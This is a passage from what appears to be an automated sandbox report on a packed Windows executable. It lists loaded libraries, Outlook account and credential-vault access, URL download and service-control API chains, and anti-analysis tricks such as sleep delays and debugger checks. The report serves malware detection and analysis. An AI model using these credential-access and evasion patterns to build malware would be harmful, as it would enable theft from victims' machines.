                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: webio.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: pstorec.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.cfg
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 4.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 5.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeUnpacked PE file: 6.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00434006 push ecx; ret 0_2_00434019
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004567F0 push eax; ret 0_2_0045680E
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00455EBF push ecx; ret 0_2_00455ED2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832806 push ecx; ret 0_2_02832819
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000B146 push ecx; ret 0_2_1000B159
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1002343D push esi; ret 0_2_10023446
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0A4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0CC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00451D34 push eax; ret 5_2_00451D41
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00444E71 push ecx; ret 5_2_00444E81
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_00414074
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_0041409C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00414039 push ecx; ret 6_2_00414049
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW,0_2_00406128
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040E54F Sleep,ExitProcess,0_2_0040E54F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004198D2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeWindow / User API: threadDelayed 4761Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeWindow / User API: threadDelayed 5138Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-70147
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAPI coverage: 10.0 %
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep count: 4761 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep time: -14283000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 4904Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep count: 5138 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe TID: 5576Thread sleep time: -15414000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_028310F1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02836580 FindFirstFileExA,0_2_02836580
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_10005C00
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_10007E20
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,0_2_100073F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10018AD0 FindFirstFileExA,0_2_10018AD0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407EF8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407898
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00418981 memset,GetSystemInfo,4_2_00418981
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139350448.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2144560782.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4570038168.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4570038168.0000000000853000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2139177976.0000000000853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCF3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00442564 mov eax, dword ptr fs:[00000030h]0_2_00442564
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02834AB4 mov eax, dword ptr fs:[00000030h]0_2_02834AB4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10014BBC mov eax, dword ptr fs:[00000030h]0_2_10014BBC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,0_2_00410B19
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434178
